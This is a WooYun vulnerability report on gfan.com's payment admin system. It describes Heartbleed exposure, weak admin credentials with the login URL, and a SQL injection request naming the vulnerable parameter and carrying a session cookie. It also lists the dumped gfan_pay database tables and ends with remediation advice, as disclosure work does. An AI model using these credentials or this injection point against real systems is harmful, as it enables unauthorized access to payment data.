当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173640

漏洞标题:机锋网openssl心脏滴血/后台存在SQL注入漏洞

相关厂商:机锋网

漏洞作者: darkrerror

提交时间:2016-01-29 15:56

修复时间:2016-02-03 16:00

公开时间:2016-02-03 16:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-29: 细节已通知厂商并且等待厂商处理中
2016-02-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

心脏滴血漏洞:
https://gms.gfan.com

q1.jpg


q2.jpg


弱口令:
http://gms.gfan.com:8080/loginAction.do?method=login&password=admin&username=admin
duyun/123456

q3.jpg


注入 :

GET /messageConsumeDetailClientAction.do?method=findList&searchModel=1&type=on&beginDate=2016-01-21&endDate=2016-01-28&searchType=3&searchContent=&appKey=0&channelId=【注入点】 HTTP/1.1
Host: gms.gfan.com:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: pgv_pvid=7868685976; pgv_pvi=3890574959; tma=227519179.71033145.1453946842670.1453946842670.1453946842670.1; tmd=13.227519179.71033145.1453946842670.; bfd_g=8a7bc81f66bd068d00007994001eb3685657f5ae; Hm_lvt_94a1188546fb923d8b3b2187e3fab67b=1453966434; Jb1kcwceGvQ="RSl21GK7Bz+ZfiFmSC6RT4ok5rdLyjnWIT+0aQJUFHk="; cva4j+xqajE="x268oKYi94HeCy4ffuE5Eq9Th5eejEcrdFqAiDdJIp/3hjHregTpHZenfvd4eQETgrep41MRdz4="; __utma=227519179.506361208.1453946842.1453966434.1454030994.3; __utmc=227519179; __utmz=227519179.1453946842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_6790309a725fc338d4fe3efb72d4a6ea=1454031169; Hm_lpvt_6790309a725fc338d4fe3efb72d4a6ea=1454031169; JSESSIONID=D0548E95C7A3ADA4A1F50AEF61E99E22


管理员账号密码:

q4.jpg


漏洞证明:

Database: gfan_pay
[68 tables]
+------------------------------+
| user |
| action_type |
| admin_operate_log |
| admin_user |
| app_info_apk |
| card_config |
| channel |
| charge_log |
| check_check_info |
| check_check_status |
| client_channel |
| consume_log |
| contrast_appkey_productid |
| login_log_20121222 |
| login_log_tmp |
| payorder_status_log |
| rebate_info |
| recharge_alipay_notify_log |
| recharge_channel |
| recharge_channel_account |
| recharge_dic_channel |
| recharge_jd_notify_log |
| recharge_junka_notify_log |
| recharge_log |
| recharge_mo9_notify_log |
| recharge_order |
| recharge_order_history |
| recharge_order_operate_log |
| recharge_order_reb |
| recharge_request |
| recharge_submit |
| recharge_tenpay_notify_log |
| recharge_uc_recharge_log |
| recharge_unionpay_notify_log |
| recharge_unionpay_trade_log |
| recharge_wechat_notify_log |
| sdk_app |
| sdk_message_client_log |
| sdk_message_pay_log |
| sdk_pay_log |
| sdk_pay_point_arrive |
| sdk_save_ios_order |
| sdk_sp_dictionary |
| sdk_sp_sms |
| sdk_tag_phone_log |
| sdk_update_log |
| shenzhoufu |
| sp_channelinfo_admini |
| sp_companyinfo_admini |
| sp_developerinfo_admini |
| sp_errormessages_log |
| sp_install_forwardtell_log |
| sp_partname_admini |
| sp_pay_forwardtell_log |
| sp_spcustom_admini |
| sp_statusreport_log |
| sp_support_admini |
| sp_uploadinterface_log |
| sp_userinfo_admini |
| sp_version_admini |
| test |
| tgr_getcharge_logbyuid |
| tgr_getconsume_logbyuid |
| tgr_getsdk_appbyuid |
| uc_pay_log |
| uc_uid_imei |
| user_payorder_url |
| wap_test |
+------------------------------+

修复方案:

升级openssl
增强口令
用参数化方法构建SQL语句,以防止数据库执行从用户输入插入的SQL语句。

版权声明:转载请注明来源 darkrerror@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-03 16:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价